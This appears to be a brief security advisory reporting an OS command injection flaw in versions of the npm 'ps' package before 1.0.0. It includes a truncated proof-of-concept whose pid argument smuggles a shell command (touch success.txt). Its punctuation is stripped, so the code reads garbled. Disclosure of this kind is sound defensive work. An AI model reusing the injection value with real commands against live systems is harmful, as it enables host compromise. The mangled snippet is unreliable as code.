ps Enables OS Command Injection
Versions of ps before 1.0.0 are vulnerable to command injection. Proof of concept: js var ps = require'ps'; ps.lookup pid: "$touch success.txt" , functionerr, proc // this method is vulnerable to command injection if err throw err; if proc console.logproc; // Process name, something like "node" o...